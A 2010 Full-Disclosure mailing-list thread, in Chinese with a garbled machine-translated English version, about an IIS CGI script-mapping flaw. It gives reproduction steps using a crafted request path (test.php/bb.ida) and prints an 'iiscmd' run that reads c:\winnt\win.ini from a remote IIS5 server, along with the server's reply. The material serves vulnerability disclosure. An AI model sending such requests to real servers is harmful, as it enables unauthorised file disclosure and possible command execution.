Re: [Full-disclosure] iis4\iis5 cgi bug and WEB Service CGI Interface Vulnerability Analysis (continued)

[yuange <yuange1975@xxxxxxxxxxx>]

Ms test that was given, but the developers do not think ms loopholes, really 
interesting, have to make to provide a successful test case. Do not bother them 
again, and developers say.


 The following test:
      1, the environment, the latest patch win2003 iis6;
      2, configure, make maps. Ida -> c: \ windows \ system32 \ idq.dll,. Php-> 
c: \ php \ php.exe
      3, test, first open the procexp to view the process environment 
variables, request: http://127.0.0.1/test.php/bb.ida
          W3wp.exe process quickly with procexp open a new process under the 
php.exe, view the environment variables:
          SCRIPT_NAME = / test.php
          PATH_INFO = / test.php / bb.idq
          PATH_TRANSLATED = c: \ inetpub \ wwwroot \ test.php \ bb.ida
     Indicating the request http://127.0.0.1/test.php/bb.ida, IIS6 
identification is mapped. Php, cgi and variable PATH_TRANSLATED is the 
execution of the program script, PATH_TRANSLATED = c: \ inetpub \ wwwroot \ 
test.php \ bb. ida, that to carry out. ida file.
     "What that means is, that I can go to any implementation of an interpreter 
of a mapping file."
     The consequences of a simple script file contents can leak, severe control 
of the server can execute the command.
 
 

 曾经发给ms的测试说明,不过ms的开发人员认为不是漏洞,真有意思,非得让提供成功测试案例.懒得再和他们开发人员说了.
 
 
 如下测试：
      1、环境，最新补丁的win2003+iis6；
      2、配置，做映射 .ida  ->  c:\windows\system32\idq.dll, .php-> c:\php\php.exe
      3、测试，先打开procexp用于查看进程环境变量，请求:http://127.0.0.1/test.php/bb.ida
          迅速用procexp打开w3wp.exe进程下新进程php.exe，查看环境变量：
          SCRIPT_NAME=/test.php
          PATH_INFO=/test.php/bb.ida
          PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida
     
说明请求http://127.0.0.1/test.php/bb.ida，IIS6识别是映射.php，而变量PATH_TRANSLATED是cgi程序执行的脚本，;
 PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida，说明去执行了.ida文件。
     “那意思是什么呢，就是说我可以任意以一种解释程序去执行一种影射文件”。
     简单的后果是可以泄露脚本文件内容，严重的就可以执行命令控制服务器。
 

 
 


From: www417@xxxxxxxxx
Date: Sat, 11 Dec 2010 18:48:09 +0800
Subject: Re: [Full-disclosure] iis4\iis5 cgi bug and WEB Service CGI Interface 
Vulnerability Analysis (continued)
To: yuange1975@xxxxxxxxxxx


yuange：
 
这篇文章的中文版以前就看过，但是当时没什么感觉。今天重读觉得有些启发。
 
如果没弄错，我想iiscmd程序应该是让php.exe去解释了c:\winnt\win.ini文件。
但是我想不出执行任意命令是怎么实现的。。。
 
应该不是缓冲区溢出那种暴力的方式，应该是一种比较巧妙的方法。
 

3w417

在 2010年12月11日 下午2:06，yuange <yuange1975@xxxxxxxxxxx>写道：


Too many bad things in the belly of the fast. 2000 of iis, unicode \ decode \ 
cgi \ webdav \ etc vulnerability, reaching a peak, and later transferred to rpc 
study. Now there is a 01 or so found a serious flaw, iis4, 5 set error load ing 
cgi vulnerability, execute arbitrary commands or view arbitrary files. Spent 
nearly a decade, this vulnerability have been quickly eaten away. Because 
iis5.1 core code into the kernel start iis, this exploit code has been dropped, 
so will not need a later version.
   There are loopholes in some time ago to write an article. Did not intend to 
put out, and feel that soon decayed, it released together.

  
http://hi.baidu.com/yuange1975/blog/item/6432bffa52252f0fa8d311ac.html
 
C:\tool>iiscmd -s 192.168.0.112 -f c:\winnt\win.ini
recv:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Dec 2010 05:21:17 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo

Server close!


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/